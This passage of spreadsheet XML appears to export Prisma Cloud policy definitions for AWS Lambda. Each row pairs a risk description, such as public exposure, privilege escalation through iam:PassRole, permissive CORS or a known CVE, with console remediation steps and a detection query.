      <c r="U2006" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2006" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2006" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed and have known exploitable denial of service vulnerability [Java Spring Framework, CVE-2021-22119].
Denial of service vulnerability is a security flaw allowing a user to make a machine or network resource unavailable. Exploiting this vulnerability affects the availability of resources. The fact that the AWS Lambda function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Java [CVE-2021-22119] vulnerability and public exposure reported for the AWS Lambda function as soon as possible.</t>
        </is>
      </c>
      <c r="X2006"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2006" t="inlineStr"/>
      <c r="Z2006" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda') AND with : (Vuln WHERE id IN ('CVE-2021-22119'))</t>
        </is>
      </c>
      <c r="AA2006" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2006" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:01</t>
        </is>
      </c>
      <c r="AC2006" t="inlineStr"/>
      <c r="AD2006" t="b">
        <v>1</v>
      </c>
      <c r="AE2006" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2006" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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6" t="inlineStr">
        <is>
          <t>83f6992e-3f97-4cc8-8d7a-aed096fea529</t>
        </is>
      </c>
      <c r="AI2006" t="inlineStr">
        <is>
          <t>68d2f61b-e9a7-4f90-8d21-36db119cdb13</t>
        </is>
      </c>
      <c r="AJ2006" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2006" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2007">
      <c r="A2007" t="inlineStr"/>
      <c r="B2007" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2007" s="2" t="inlineStr"/>
      <c r="D2007" t="inlineStr"/>
      <c r="E2007" t="inlineStr"/>
      <c r="F2007" t="inlineStr"/>
      <c r="G2007" t="b">
        <v>1</v>
      </c>
      <c r="H20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07" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2007" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2007" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed unauthenticated AWS Lambda function with iam:PassRole and lambda creation permissions</t>
        </is>
      </c>
      <c r="L2007" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2007" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2007" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2007" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2007" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2007" t="inlineStr"/>
      <c r="R2007" t="inlineStr"/>
      <c r="S2007" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2007" t="b">
        <v>0</v>
      </c>
      <c r="U2007" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2007" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2007" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed, URL AuthType set to NONE,  assigned with iam:PassRole, and have lambda creation permissions.
AuthType determines how Lambda authenticates or authorises requests to your function URL. When AuthType is set to NONE, Lambda doesn't perform any authentication before invoking your function. The lambda function publicly accessible from the internet could allow malicious actors to get initial access to the lambda function and create a Lambda Function with any role and give themselves the permissions to invoke it. They would be able to escalate their permissions by attaching a privileged role to the function while defining the Lambda's actions.
This policy checks for the following permissions:
'iam:PassRole', 'lambda:CreateFunction', 'lambda:AddPermission'.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2007" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find the resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access
[PERMISSION]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the Lambda Function
3. Select the ‘Permissions' section under the 'Configuration’ tab
4. Navigate to the IAM Role by clicking on the Role name
5 Under 'Permissions policies', find the relevant policy according to the alert details and remove the risky actions
[MISCONFIGURATION]
1. Sign in to the AWS console
2. Select the region from the region drop-down for which the alert is generated
3. Navigate to the AWS Lambda Dashboard
4. Click on 'Functions' (Left panel)
5. Select the lambda function for which the alert is generated
6. Go to the 'Configuration' tab
7. Select 'Function URL'
8. Click on 'Edit'
9. Set 'Auth type' to 'AWS_IAM'
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2007" t="inlineStr"/>
      <c r="Z2007" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-lambda-list-functions' ) and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Compute Instance (EC2/Lambda) Assigned Lambda Creation Permissions Which Could Lead to Privilege Escalation')</t>
        </is>
      </c>
      <c r="AA2007" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2007" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:05</t>
        </is>
      </c>
      <c r="AC2007" t="inlineStr"/>
      <c r="AD2007" t="b">
        <v>1</v>
      </c>
      <c r="AE2007" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2007" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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07" t="inlineStr">
        <is>
          <t>8a1ed740-d835-4627-b803-52a4f590cd67</t>
        </is>
      </c>
      <c r="AI2007" t="inlineStr">
        <is>
          <t>4f024ca6-b8da-4bb1-92bf-014c9cf22adb</t>
        </is>
      </c>
      <c r="AJ2007" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2007" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2008">
      <c r="A2008" t="inlineStr"/>
      <c r="B2008" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2008" s="2" t="inlineStr"/>
      <c r="D2008" t="inlineStr"/>
      <c r="E2008" t="inlineStr"/>
      <c r="F2008" t="inlineStr"/>
      <c r="G2008" t="b">
        <v>1</v>
      </c>
      <c r="H20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08" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2008" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2008" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable AWS Lambda function [Python, CVE-2021-20270]</t>
        </is>
      </c>
      <c r="L2008" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2008" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2008" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2008" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2008" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2008" t="inlineStr"/>
      <c r="R2008" t="inlineStr"/>
      <c r="S2008" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2008" t="b">
        <v>0</v>
      </c>
      <c r="U2008" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2008" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2008" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions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AWS Lambda function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2021-20270] vulnerability and public exposure reported for the AWS Lambda function as soon as possible.</t>
        </is>
      </c>
      <c r="X2008" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access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2008" t="inlineStr"/>
      <c r="Z2008" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda') AND with : (Vuln WHERE id IN ('CVE-2021-20270'))</t>
        </is>
      </c>
      <c r="AA2008" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2008" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:59</t>
        </is>
      </c>
      <c r="AC2008" t="inlineStr"/>
      <c r="AD2008" t="b">
        <v>1</v>
      </c>
      <c r="AE2008" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2008" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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08" t="inlineStr">
        <is>
          <t>9447e0b9-08f5-49fe-89b5-87c1d536300a</t>
        </is>
      </c>
      <c r="AI2008" t="inlineStr">
        <is>
          <t>88662d2e-cedd-42a4-8301-5052d7774a50</t>
        </is>
      </c>
      <c r="AJ2008" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2008" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2009">
      <c r="A2009" t="inlineStr"/>
      <c r="B2009" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2009" s="2" t="inlineStr"/>
      <c r="D2009" t="inlineStr"/>
      <c r="E2009" t="inlineStr"/>
      <c r="F2009" t="inlineStr"/>
      <c r="G2009" t="b">
        <v>1</v>
      </c>
      <c r="H20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09" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2009" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2009" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed unauthenticated AWS Lambda function with iam:PassRole and AWS Glue DevEndpoint Creation permissions</t>
        </is>
      </c>
      <c r="L2009" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2009" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2009" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2009" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2009" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2009" t="inlineStr"/>
      <c r="R2009" t="inlineStr"/>
      <c r="S2009" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2009" t="b">
        <v>0</v>
      </c>
      <c r="U2009" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2009" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2009" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed, URL AuthType set to NONE, assigned with iam:PassRole, and Glue DevEndpoint permissions.
AuthType determines how Lambda authenticates or authorises requests to your function URL. When AuthType is set to NONE, Lambda doesn't perform any authentication before invoking your function. The lambda function publicly accessible from the internet could allow malicious actors to get initial access to the lambda function and create a Glue DevEndpoint with any role that would be able to escalate their permissions by attaching a privileged role to the endpoint and configuring authentication to the endpoint using a key that they control.
This policy checks for the following permissions:
'glue:CreateDevEndpoint', 'iam:PassRole'.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2009" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find the resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access
[PERMISSION]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the Lambda Function
3. Select the 'Permissions' section under the 'Configuration' tab
4. Navigate to the IAM Role by clicking on the Role name
5. Under 'Permissions policies', find the relevant policy according to the alert details and remove the risky actions
[MISCONFIGURATION]
1. Sign in to the AWS console
2. Select the region from the region drop-down for which the alert is generated
3. Navigate to the AWS Lambda Dashboard
4. Click on 'Functions' (Left panel)
5. Select the lambda function for which the alert is generated
6. Go to the 'Configuration' tab
7. Select 'Function URL'
8. Click on 'Edit'
9. Set 'Auth type' to 'AWS_IAM'
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2009" t="inlineStr"/>
      <c r="Z2009" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-lambda-list-functions' ) and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Compute Instance (EC2/Lambda) Assigned Glue DevEndpoint Creation Permissions Which Could Lead to Privilege Escalation')</t>
        </is>
      </c>
      <c r="AA2009" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2009" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:06</t>
        </is>
      </c>
      <c r="AC2009" t="inlineStr"/>
      <c r="AD2009" t="b">
        <v>1</v>
      </c>
      <c r="AE2009" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2009" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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09" t="inlineStr">
        <is>
          <t>ed451819-405c-4e97-8f8f-b98e18ec2cf7</t>
        </is>
      </c>
      <c r="AI2009" t="inlineStr">
        <is>
          <t>730a3709-0e9d-481f-a9fb-cabc8b353e68</t>
        </is>
      </c>
      <c r="AJ2009" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2009" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2010">
      <c r="A2010" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, HIPAA, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, TX-RAMP Level 1, ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2010" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2010" s="2" t="inlineStr"/>
      <c r="D2010" t="inlineStr"/>
      <c r="E2010" t="inlineStr"/>
      <c r="F2010" t="inlineStr"/>
      <c r="G2010" t="b">
        <v>1</v>
      </c>
      <c r="H20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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2010" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2010" t="inlineStr">
        <is>
          <t>AWS Lambda function URL having overly permissive cross-origin resource sharing permissions</t>
        </is>
      </c>
      <c r="L2010" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2010" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2010" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2010" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2010" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2010" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R2010" t="inlineStr">
        <is>
          <t>6.2</t>
        </is>
      </c>
      <c r="S2010" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2010" t="b">
        <v>0</v>
      </c>
      <c r="U2010" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2010" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2010" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda functions which have overly permissive cross-origin resource sharing (CORS) permissions. Overly permissive CORS settings (allowing wildcards) can potentially expose the Lambda function to unwarranted requests and cross-site scripting attacks. It is highly recommended to specify the exact domains (in 'allowOrigins') and HTTP methods (in 'allowMethods') that should be allowed to interact with your function to ensure a secure setup.</t>
        </is>
      </c>
      <c r="X2010" t="inlineStr">
        <is>
          <t>To properly configure CORS permissions, refer the following URL:
https://docs.aws.amazon.com/lambda/latest/dg/API_Cors.html</t>
        </is>
      </c>
      <c r="Y2010" t="inlineStr"/>
      <c r="Z2010" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-lambda-list-functions' AND json.rule = cors exists and cors.allowOrigins[*] contains "*" and cors.allowMethods[*] contains "*"</t>
        </is>
      </c>
      <c r="AA2010" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2010" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2010" t="inlineStr">
        <is>
          <t>PC-AWS-LMB-1054</t>
        </is>
      </c>
      <c r="AD2010" t="b">
        <v>1</v>
      </c>
      <c r="AE2010" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2010" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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0" t="inlineStr">
        <is>
          <t>7bf83882-02ad-4f79-803c-ed4588e166cd</t>
        </is>
      </c>
      <c r="AI2010" t="inlineStr">
        <is>
          <t>c7ce78c7-5412-43f0-ae9c-c90410957502</t>
        </is>
      </c>
      <c r="AJ2010" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2010" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2011">
      <c r="A2011" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, HIPAA, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), SOC 2, SOC 2, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2011" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2011" s="2" t="inlineStr"/>
      <c r="D2011" t="inlineStr"/>
      <c r="E2011" t="inlineStr"/>
      <c r="F2011" t="inlineStr"/>
      <c r="G2011" t="b">
        <v>1</v>
      </c>
      <c r="H20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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2011" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2011" t="inlineStr">
        <is>
          <t>AWS Lambda Function resource-based policy is overly permissive</t>
        </is>
      </c>
      <c r="L2011" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2011" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2011" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2011" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2011" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2011" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R2011" t="inlineStr">
        <is>
          <t>6.2</t>
        </is>
      </c>
      <c r="S2011" t="inlineStr"/>
      <c r="T2011" t="b">
        <v>0</v>
      </c>
      <c r="U2011" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2011" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2011" t="inlineStr">
        <is>
          <t>This policy identifies Lambda Functions that have overly permissive resource-based policy. Lambda functions having overly permissive policy could lead to lateral movement in account or privilege being escalated when compromised. It is highly recommended to have the least privileged access policy to protect the Lambda Functions from unauthorized access.
For more details:
https://docs.aws.amazon.com/lambda/latest/dg/access-control-resource-based.html</t>
        </is>
      </c>
      <c r="X2011" t="inlineStr">
        <is>
          <t>To modify permission from AWS Lambda Function resource-based policy
1. Sign in to the AWS console
2. Select the region, from the region drop-down, for which the alert is generated
3. Navigate to AWS Lambda Dashboard
4. Click on the 'Functions' (Left panel)
5. Select the lambda function on which the alert is generated
6. Go to Configuration tab
7. Select Permissions
8. Scroll to the \"Resource-based policy\" area
9. For each policy statement, use fine-grained and restrictive permissions instead of using wildcards (Lambda:* and Resource:*) OR add in appropriate conditions with least privilege access.
10. Click on \"Edit\" button to modify the statement
11. When you finish configuring the statement, choose 'Save'.
To remove permission from AWS Lambda Function resource-based policy
1. Sign in to the AWS console
2. Select the region, from the region drop-down, for which the alert is generated
3. Navigate to AWS Lambda Dashboard
4. Click on the 'Functions' (Left panel)
5. Select the lambda function on which the alert is generated
6. Go to Configuration tab
7. Select Permissions
8. Scroll to the \"Resource-based policy\" area
9. For each policy statement, use fine-grained and restrictive permissions instead of using wildcards (Lambda:* and Resource:*) OR add in appropriate conditions with least privilege access.
10. Click on \"Delete\" button to modify the statement
11. In Delete statement dialog box, click on \"Delete\" button. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-301
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-301</t>
        </is>
      </c>
      <c r="Y2011" t="inlineStr"/>
      <c r="Z2011" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-lambda-list-functions' AND json.rule = policy.Statement[?any(Effect equals Allow and Principal equals "*" and Condition does not exist and (Action equals "*" or Action equals lambda:*))] exists
{"category":"General","resourceTypes":["aws_lambda_permission"]}</t>
        </is>
      </c>
      <c r="AA2011" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2011" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2011" t="inlineStr">
        <is>
          <t>PC-AWS-LMB-885-CKV_AWS_301</t>
        </is>
      </c>
      <c r="AD2011" t="b">
        <v>1</v>
      </c>
      <c r="AE2011" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2011" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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1" t="inlineStr">
        <is>
          <t>805cd86b-3e3e-4913-9f12-0b208c657b23</t>
        </is>
      </c>
      <c r="AI2011" t="inlineStr">
        <is>
          <t>dc0d3fb7-4c3e-4930-b68b-931908d36d71</t>
        </is>
      </c>
      <c r="AJ2011" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2011" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2012">
      <c r="A2012" t="inlineStr"/>
      <c r="B2012" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2012" s="2" t="inlineStr"/>
      <c r="D2012" t="inlineStr"/>
      <c r="E2012" t="inlineStr"/>
      <c r="F2012" t="inlineStr"/>
      <c r="G2012" t="b">
        <v>1</v>
      </c>
      <c r="H20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12" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2012" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2012" t="inlineStr">
        <is>
          <t>Privilege escalation and unauthorised access risk due to a publicly exposed and unauthenticated AWS Lambda with administrative permissions</t>
        </is>
      </c>
      <c r="L2012" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2012" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2012" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2012" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2012" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2012" t="inlineStr"/>
      <c r="R2012" t="inlineStr"/>
      <c r="S2012" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2012" t="b">
        <v>0</v>
      </c>
      <c r="U2012" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2012" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2012" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Function that are publicly exposed through resource based policies and publicly modifiable with URL AuthType set to NONE and have administrative permissions.
AuthType determines how Lambda authenticates or authorises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further help the attackers to perform unauthorised actions in the cloud account. Granting administrative permissions to the function can further help the attackers to perform unauthorized actions, privilege escalation or lateral movements in the cloud account.
Immediate attention is required to configure Lambda function authentication type to AWS_IAM and remove unwanted permissions assigned to the Lambda function. Restrict public exposure reported for the Lambda Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2012" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find resource-based policy of the AWS Lambda Function resource
4. Under 'Resource-based policy statements' edit the resource policy to only allow required parties to modify and invoke the function
[Misconfiguration]
Remediation steps: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[PERMISSION]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2012" t="inlineStr"/>
      <c r="Z2012" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda','Publicly Writable Lambda','AWS Lambda Function with administrative permissions','AWS Lambda function URL AuthType set to NONE')</t>
        </is>
      </c>
      <c r="AA2012" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2012" t="inlineStr">
        <is>
          <t>2024-09-27 06:57:39</t>
        </is>
      </c>
      <c r="AC2012" t="inlineStr"/>
      <c r="AD2012" t="b">
        <v>1</v>
      </c>
      <c r="AE2012" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2012" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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12" t="inlineStr">
        <is>
          <t>811b848f-8154-4176-89a1-f3d60969be9f</t>
        </is>
      </c>
      <c r="AI2012" t="inlineStr">
        <is>
          <t>53fc0bbd-7e4d-45d5-9374-723e8d69247b</t>
        </is>
      </c>
      <c r="AJ2012" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2012" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2013">
      <c r="A2013" t="inlineStr"/>
      <c r="B2013" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2013" s="2" t="inlineStr"/>
      <c r="D2013" t="inlineStr"/>
      <c r="E2013" t="inlineStr"/>
      <c r="F2013" t="inlineStr"/>
      <c r="G2013" t="b">
        <v>1</v>
      </c>
      <c r="H20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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2013" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2013" t="inlineStr">
        <is>
          <t>Security group tampering risk due to a publicly exposed unauthenticated AWS Lambda function with 'write' permission over security groups</t>
        </is>
      </c>
      <c r="L2013" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2013" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2013" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2013" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2013" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2013" t="inlineStr"/>
      <c r="R2013" t="inlineStr"/>
      <c r="S2013" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2013" t="b">
        <v>0</v>
      </c>
      <c r="U2013" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2013" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2013" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed through resource based policies with URL AuthType set to NONE and have 'write' permission over security groups.
Security groups are used to control access to various AWS services such as RDS, EC2, and Redshift. AuthType of Lambda function determines how Lambda authenticates or authorises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with 'write' permissions over security groups can lead to unauthorized access and data breach.
This policy checks for the following write permissions over security groups:
